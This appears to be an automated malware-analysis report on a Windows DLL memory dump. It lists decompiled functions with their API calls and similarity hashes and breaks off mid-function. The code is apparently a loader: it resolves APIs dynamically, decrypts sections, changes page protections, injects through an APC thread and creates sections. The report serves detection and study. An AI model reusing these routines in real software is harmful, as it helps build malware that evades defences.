                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F1146(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				_Unknown_base(*)()* _t29;
                                                                                                                				_Unknown_base(*)()* _t33;
                                                                                                                				_Unknown_base(*)()* _t36;
                                                                                                                				_Unknown_base(*)()* _t39;
                                                                                                                				_Unknown_base(*)()* _t42;
                                                                                                                				intOrPtr _t46;
                                                                                                                				struct HINSTANCE__* _t50;
                                                                                                                				intOrPtr _t56;
                                                                                                                
                                                                                                                				_t56 = E6E1F2009(0x20);
                                                                                                                				if(_t56 == 0) {
                                                                                                                					_v8 = 8;
                                                                                                                				} else {
                                                                                                                					_t50 = GetModuleHandleA( *0x6e1f4144 + 0x6e1f5014);
                                                                                                                					_v8 = 0x7f;
                                                                                                                					_t29 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f5151);
                                                                                                                					 *(_t56 + 0xc) = _t29;
                                                                                                                					if(_t29 == 0) {
                                                                                                                						L8:
                                                                                                                						E6E1F201E(_t56);
                                                                                                                					} else {
                                                                                                                						_t33 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f5161);
                                                                                                                						 *(_t56 + 0x10) = _t33;
                                                                                                                						if(_t33 == 0) {
                                                                                                                							goto L8;
                                                                                                                						} else {
                                                                                                                							_t36 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f5174);
                                                                                                                							 *(_t56 + 0x14) = _t36;
                                                                                                                							if(_t36 == 0) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								_t39 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f5189);
                                                                                                                								 *(_t56 + 0x18) = _t39;
                                                                                                                								if(_t39 == 0) {
                                                                                                                									goto L8;
                                                                                                                								} else {
                                                                                                                									_t42 = GetProcAddress(_t50,  *0x6e1f4144 + 0x6e1f519f);
                                                                                                                									 *(_t56 + 0x1c) = _t42;
                                                                                                                									if(_t42 == 0) {
                                                                                                                										goto L8;
                                                                                                                									} else {
                                                                                                                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                										_t46 = E6E1F1996(_t56, _a12); // executed
                                                                                                                										_v8 = _t46;
                                                                                                                										if(_t46 != 0) {
                                                                                                                											goto L8;
                                                                                                                										} else {
                                                                                                                											 *_a16 = _t56;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}












                                                                                                                0x6e1f120d
                                                                                                                0x6e1f1208
                                                                                                                0x6e1f11eb
                                                                                                                0x6e1f11d5
                                                                                                                0x6e1f11bf
                                                                                                                0x6e1f11a9
                                                                                                                0x6e1f1193
                                                                                                                0x6e1f1227

                                                                                                                APIs
                                                                                                                  • Part of subcall function 6E1F2009: HeapAlloc.KERNEL32(00000000,?,6E1F1FA5,00000208,00000000,00000000,?,?,?,6E1F14C0,?), ref: 6E1F2015
                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1F1670,?,?,?,?,?,00000002,?,?), ref: 6E1F116A
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F118C
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11A2
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11B8
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11CE
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11E4
                                                                                                                  • Part of subcall function 6E1F1996: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1F19F3
                                                                                                                  • Part of subcall function 6E1F1996: memset.NTDLL ref: 6E1F1A15
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1632424568-0
                                                                                                                • Opcode ID: 642e2a92653ba6aacc102a72b74c25806c86572ed8847b4b73d740dff70185d9
                                                                                                                • Instruction ID: 9b82a9d525289ade194d177f8b0889dde4793554265f76736586c1f05057a469
                                                                                                                • Opcode Fuzzy Hash: 642e2a92653ba6aacc102a72b74c25806c86572ed8847b4b73d740dff70185d9
                                                                                                                • Instruction Fuzzy Hash: AD214DB1604A0BDFDB10DFF9D940A5A77ECAF553047218426E845E7211E770E946ABE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21304A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213063
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 172949856-0
                                                                                                                • Opcode ID: 3c05249b15fedf4d7580a020de3a2450b1e7498a24adcdc87a336de3d02c1699
                                                                                                                • Instruction ID: f2d0f907327948fa3ce1da43a3092cfdb84b46c2123335d3d46d6f2565de3264
                                                                                                                • Opcode Fuzzy Hash: 3c05249b15fedf4d7580a020de3a2450b1e7498a24adcdc87a336de3d02c1699
                                                                                                                • Instruction Fuzzy Hash: C431F6B5D1821D9FCB08CFE4C955AEEB7FAFB48314F104629E525A7390DB346A04CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                				long _v8;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				char _t9;
                                                                                                                				void* _t10;
                                                                                                                				void* _t18;
                                                                                                                				void* _t23;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t9 = _a8;
                                                                                                                				_v8 = 1;
                                                                                                                				if(_t9 == 0) {
                                                                                                                					_t10 = InterlockedDecrement(0x6e1f4108);
                                                                                                                					__eflags = _t10;
                                                                                                                					if(_t10 == 0) {
                                                                                                                						__eflags =  *0x6e1f410c;
                                                                                                                						if( *0x6e1f410c != 0) {
                                                                                                                							_t36 = 0x2328;
                                                                                                                							while(1) {
                                                                                                                								SleepEx(0x64, 1);
                                                                                                                								__eflags =  *0x6e1f4118;
                                                                                                                								if( *0x6e1f4118 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t36 = _t36 - 0x64;
                                                                                                                								__eflags = _t36;
                                                                                                                								if(_t36 > 0) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							CloseHandle( *0x6e1f410c);
                                                                                                                						}
                                                                                                                						HeapDestroy( *0x6e1f4110);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(_t9 == 1 && InterlockedIncrement(0x6e1f4108) == 1) {
                                                                                                                						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                						 *0x6e1f4110 = _t18;
                                                                                                                						_t41 = _t18;
                                                                                                                						if(_t18 == 0) {
                                                                                                                							L6:
                                                                                                                							_v8 = 0;
                                                                                                                						} else {
                                                                                                                							 *0x6e1f4130 = _a4;
                                                                                                                							asm("lock xadd [eax], edi");
                                                                                                                							_push( &_a8);
                                                                                                                							_t23 = E6E1F155C(E6E1F15EA, E6E1F1A86(_a12, 1, 0x6e1f4118, _t41));
                                                                                                                							 *0x6e1f410c = _t23;
                                                                                                                							if(_t23 == 0) {
                                                                                                                								asm("lock xadd [esi], eax");
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • InterlockedIncrement.KERNEL32(6E1F4108), ref: 6E1F1D6D
                                                                                                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1F1D82
                                                                                                                  • Part of subcall function 6E1F155C: CreateThread.KERNELBASE ref: 6E1F1573
                                                                                                                  • Part of subcall function 6E1F155C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1F1588
                                                                                                                  • Part of subcall function 6E1F155C: GetLastError.KERNEL32(00000000), ref: 6E1F1593
                                                                                                                  • Part of subcall function 6E1F155C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1F159D
                                                                                                                  • Part of subcall function 6E1F155C: CloseHandle.KERNEL32(00000000), ref: 6E1F15A4
                                                                                                                  • Part of subcall function 6E1F155C: SetLastError.KERNEL32(00000000), ref: 6E1F15AD
                                                                                                                • InterlockedDecrement.KERNEL32(6E1F4108), ref: 6E1F1DD5
                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 6E1F1DEF
                                                                                                                • CloseHandle.KERNEL32 ref: 6E1F1E0B
                                                                                                                • HeapDestroy.KERNEL32 ref: 6E1F1E17
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2110400756-0
                                                                                                                • Opcode ID: bca6fee3ce43a11feb739504a49e0c8c61267433eb95841d85069fc9adb39e5a
                                                                                                                • Instruction ID: c2c7a6e1888d56ccc0dd1b1f2188b7fea01fc98ed7b379a8327be68e7e829dc6
                                                                                                                • Opcode Fuzzy Hash: bca6fee3ce43a11feb739504a49e0c8c61267433eb95841d85069fc9adb39e5a
                                                                                                                • Instruction Fuzzy Hash: 8521A4B1704605EFCB019FE9DD8C94A3BF8FB663617108529E416E2102D330998BBFD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F155C(long _a4, DWORD* _a12) {
                                                                                                                				_Unknown_base(*)()* _v0;
                                                                                                                				void* _t4;
                                                                                                                				long _t6;
                                                                                                                				long _t11;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1f4140, 0, _a12); // executed
                                                                                                                				_t13 = _t4;
                                                                                                                				if(_t13 != 0) {
                                                                                                                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                					if(_t6 == 0) {
                                                                                                                						_t11 = GetLastError();
                                                                                                                						TerminateThread(_t13, _t11);
                                                                                                                						CloseHandle(_t13);
                                                                                                                						_t13 = 0;
                                                                                                                						SetLastError(_t11);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t13;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE ref: 6E1F1573
                                                                                                                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1F1588
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 6E1F1593
                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1F159D
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6E1F15A4
                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6E1F15AD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 3832013932-0
                                                                                                                • Opcode ID: c9bcf2240564073cbc6a965df18956419aa53106e2318db64b2f812bc7574846
                                                                                                                • Instruction ID: 4e75fb8dca12f187ac41966a7ad18cb48a73339653327eb24a22f0a86bbc8f56
                                                                                                                • Opcode Fuzzy Hash: c9bcf2240564073cbc6a965df18956419aa53106e2318db64b2f812bc7574846
                                                                                                                • Instruction Fuzzy Hash: 42F05472204A10FBDB225BA0AC0CF5EBFE4FB1A701F008405F50791150C7218502BBE6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E6E1F1717(void* __edi, intOrPtr _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				void* _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				char _v28;
                                                                                                                				signed int _v32;
                                                                                                                				void* _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed char _v44;
                                                                                                                				void* _v48;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				intOrPtr _t50;
                                                                                                                				void* _t57;
                                                                                                                				void* _t61;
                                                                                                                				signed int _t67;
                                                                                                                				signed char _t69;
                                                                                                                				signed char _t70;
                                                                                                                				void* _t76;
                                                                                                                				intOrPtr _t77;
                                                                                                                				unsigned int _t82;
                                                                                                                				intOrPtr _t86;
                                                                                                                				intOrPtr* _t89;
                                                                                                                				intOrPtr _t90;
                                                                                                                				void* _t91;
                                                                                                                				signed int _t93;
                                                                                                                
                                                                                                                				_t90 =  *0x6e1f4130;
                                                                                                                				_t50 = E6E1F193C(_t90,  &_v28,  &_v20);
                                                                                                                				_v24 = _t50;
                                                                                                                				if(_t50 == 0) {
                                                                                                                					asm("sbb ebx, ebx");
                                                                                                                					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
                                                                                                                					_t91 = _t90 + _v28;
                                                                                                                					_v48 = _t91;
                                                                                                                					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
                                                                                                                					_t76 = _t57;
                                                                                                                					_v36 = _t76;
                                                                                                                					if(_t76 == 0) {
                                                                                                                						_v24 = 8;
                                                                                                                					} else {
                                                                                                                						_t69 = 0;
                                                                                                                						if(_t67 <= 0) {
                                                                                                                							_t77 =  *0x6e1f4140;
                                                                                                                						} else {
                                                                                                                							_t86 = _a4;
                                                                                                                							_v8 = _t91;
                                                                                                                							_v8 = _v8 - _t76;
                                                                                                                							_t14 = _t86 + 0x6e1f51a7; // 0x3220a9c2
                                                                                                                							_t61 = _t57 - _t91 + _t14;
                                                                                                                							_v16 = _t76;
                                                                                                                							do {
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								_t70 = _t69 + 1;
                                                                                                                								_v44 = _t70;
                                                                                                                								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
                                                                                                                								if(_t82 != 0) {
                                                                                                                									_v32 = _v32 & 0x00000000;
                                                                                                                									_t89 = _v16;
                                                                                                                									_v12 = 0x400;
                                                                                                                									do {
                                                                                                                										_t93 =  *((intOrPtr*)(_v8 + _t89));
                                                                                                                										_v40 = _t93;
                                                                                                                										if(_t93 == 0) {
                                                                                                                											_v12 = 1;
                                                                                                                										} else {
                                                                                                                											 *_t89 = _t93 + _v32 - _t82;
                                                                                                                											_v32 = _v40;
                                                                                                                											_t89 = _t89 + 4;
                                                                                                                										}
                                                                                                                										_t33 =  &_v12;
                                                                                                                										 *_t33 = _v12 - 1;
                                                                                                                									} while ( *_t33 != 0);
                                                                                                                								}
                                                                                                                								_t69 = _v44;
                                                                                                                								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
                                                                                                                								_v16 = _v16 + 0x1000;
                                                                                                                								 *0x6e1f4140 = _t77;
                                                                                                                							} while (_t69 < _t67);
                                                                                                                						}
                                                                                                                						if(_t77 != 0x63699bc3) {
                                                                                                                							_v24 = 0xc;
                                                                                                                						} else {
                                                                                                                							memcpy(_v48, _v36, _v20);
                                                                                                                						}
                                                                                                                						VirtualFree(_v36, 0, 0x8000); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v24;
                                                                                                                			}































                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1F176D
                                                                                                                • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1F1833
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1F184E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocFreememcpy
                                                                                                                • String ID: Jun 9 2021
                                                                                                                • API String ID: 4010158826-3443083063
                                                                                                                • Opcode ID: c577948e1af57871e4c0e89096b924300f29d2e380ac080f4b478f74f7362b1a
                                                                                                                • Instruction ID: fd0c265d1e830dea2869a0a5579e080fbcf90ad85ecf40f0def1ef883ebbee37
                                                                                                                • Opcode Fuzzy Hash: c577948e1af57871e4c0e89096b924300f29d2e380ac080f4b478f74f7362b1a
                                                                                                                • Instruction Fuzzy Hash: 55418AB1E0020ADFDB00CF98C980ADEBBF6BF48310F248169D90577245C775A98ADBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E6E1F15EA(void* __ecx, char _a4) {
                                                                                                                				long _t3;
                                                                                                                				int _t4;
                                                                                                                				int _t9;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_t13 = GetCurrentThread();
                                                                                                                				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                				if(_t3 != 0) {
                                                                                                                					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                				}
                                                                                                                				_t4 = E6E1F1456(_a4); // executed
                                                                                                                				_t9 = _t4;
                                                                                                                				if(_t9 == 0) {
                                                                                                                					SetThreadPriority(_t13, _t4);
                                                                                                                				}
                                                                                                                				asm("lock xadd [eax], ecx");
                                                                                                                				return _t9;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 6E1F15ED
                                                                                                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1F15F8
                                                                                                                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1F160B
                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1F161E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                • String ID:
                                                                                                                • API String ID: 1452675757-0
                                                                                                                • Opcode ID: b51dd97a93a73309d43197691dbc6f2a46740508525a80a3de8e44a2c7a6f377
                                                                                                                • Instruction ID: a68c8bba6e6a0cb40b49a1de60ba2b01cd06b5c7e9dd89a06e82043099f1af5f
                                                                                                                • Opcode Fuzzy Hash: b51dd97a93a73309d43197691dbc6f2a46740508525a80a3de8e44a2c7a6f377
                                                                                                                • Instruction Fuzzy Hash: A4E02B70306611ABA6011A695C48E5F77ECDFD23707114336F431D21C0CB50CC07A5F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E6E1F1020(void* __eax, void* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				long _v20;
                                                                                                                				int _t43;
                                                                                                                				long _t54;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t58;
                                                                                                                				signed int _t60;
                                                                                                                
                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                				_t57 =  *0x6e1f4140;
                                                                                                                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				if(_v16 <= 0) {
                                                                                                                					L12:
                                                                                                                					return _v12;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t60 = _v12;
                                                                                                                					if(_t60 != 0) {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					asm("bt [esi+0x24], eax");
                                                                                                                					if(_t60 >= 0) {
                                                                                                                						asm("bt [esi+0x24], eax");
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							L8:
                                                                                                                							_t54 = _t57 - 0x63699bbf;
                                                                                                                							L9:
                                                                                                                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                							if(_t43 == 0) {
                                                                                                                								_v12 = GetLastError();
                                                                                                                							}
                                                                                                                							_v8 = _v8 + 1;
                                                                                                                							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                                                                                							if(_v8 < _v16) {
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						asm("bt [esi+0x24], eax");
                                                                                                                						_t54 = _t57 - 0x63699bc1;
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					asm("bt [esi+0x24], eax");
                                                                                                                					if(_t60 >= 0) {
                                                                                                                						_t54 = _t57 - 0x63699ba3;
                                                                                                                					} else {
                                                                                                                						_t54 = _t57 - 0x63699b83;
                                                                                                                					}
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				goto L12;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E1F1059
                                                                                                                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1F10CE
                                                                                                                • GetLastError.KERNEL32 ref: 6E1F10D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1469625949-0
                                                                                                                • Opcode ID: c0b71fe61ab5b4792f1e74ea67d8fb80ada1c428db44b23affd6759674906cf4
                                                                                                                • Instruction ID: 241d61fc6db792dcb840a96dc90f1fc4adf6be30e25c22212b1815c50bf6002e
                                                                                                                • Opcode Fuzzy Hash: c0b71fe61ab5b4792f1e74ea67d8fb80ada1c428db44b23affd6759674906cf4
                                                                                                                • Instruction Fuzzy Hash: C7217171A0020ADFCB14CFD5C491EAEF7F5FF04319F10495AD10297582E3B8A69AEB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _wcsnlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3628947076-0
                                                                                                                • Opcode ID: 547b4981ad83a839f0a0642563ba5a7b10b9bbb1ad57b171e549af9197ce6d1f
                                                                                                                • Instruction ID: 81d51be14bb3fe7245b613e34bdaee71105ab9a5d6628b407fc8aca9cca0b6f1
                                                                                                                • Opcode Fuzzy Hash: 547b4981ad83a839f0a0642563ba5a7b10b9bbb1ad57b171e549af9197ce6d1f
                                                                                                                • Instruction Fuzzy Hash: F6F024765A860D6FF7408AF4AC44BAF33AFCB843A5F608835FA08C5058FA39C5604291
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::ios_base::_Init.LIBCPMT ref: 6E21A534
                                                                                                                  • Part of subcall function 6E21A074: std::ios_base::clear.LIBCPMTD ref: 6E21A0A3
                                                                                                                  • Part of subcall function 6E21A074: std::locale::_Init.LIBCPMT ref: 6E21A0B8
                                                                                                                  • Part of subcall function 6E21AC30: __EH_prolog3.LIBCMT ref: 6E21AC37
                                                                                                                  • Part of subcall function 6E21AC30: std::ios_base::getloc.LIBCPMTD ref: 6E21AC40
                                                                                                                • std::ios_base::clear.LIBCPMTD ref: 6E21A561
                                                                                                                • std::ios_base::_Addstd.LIBCPMT ref: 6E21A56D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Initstd::ios_base::_std::ios_base::clear$AddstdH_prolog3std::ios_base::getlocstd::locale::_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3327797918-0
                                                                                                                • Opcode ID: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
                                                                                                                • Instruction ID: 3330ee9492993e81e3f88d9e352fdb69f91a0e885b1242d823e0163c6e2bf69b
                                                                                                                • Opcode Fuzzy Hash: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
                                                                                                                • Instruction Fuzzy Hash: 63F0E57550C31867DB20DAF0D440BC777E9AF01239F00481EE68257A80DBB5F7448794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F1E55() {
                                                                                                                				char _v16;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void _v32;
                                                                                                                				void* _v36;
                                                                                                                				intOrPtr _t15;
                                                                                                                				void* _t16;
                                                                                                                				long _t25;
                                                                                                                				int _t26;
                                                                                                                				void* _t30;
                                                                                                                				intOrPtr* _t32;
                                                                                                                				signed int _t36;
                                                                                                                				intOrPtr _t39;
                                                                                                                
                                                                                                                				_t15 =  *0x6e1f4144;
                                                                                                                				if( *0x6e1f412c > 5) {
                                                                                                                					_t16 = _t15 + 0x6e1f50f9;
                                                                                                                				} else {
                                                                                                                					_t16 = _t15 + 0x6e1f50b1;
                                                                                                                				}
                                                                                                                				E6E1F16F1(_t16, _t16);
                                                                                                                				_t36 = 6;
                                                                                                                				memset( &_v32, 0, _t36 << 2);
                                                                                                                				if(E6E1F132A( &_v32,  &_v16,  *0x6e1f4140 ^ 0xfd7cd1cf) == 0) {
                                                                                                                					_t25 = 0xb;
                                                                                                                				} else {
                                                                                                                					_t26 = lstrlenW( *0x6e1f4138);
                                                                                                                					_t8 = _t26 + 2; // 0x2
                                                                                                                					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                					_t30 = E6E1F1ADA(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                					if(_t30 == 0) {
                                                                                                                						_t32 = _v36;
                                                                                                                						 *_t32 = 0;
                                                                                                                						if( *0x6e1f4138 == 0) {
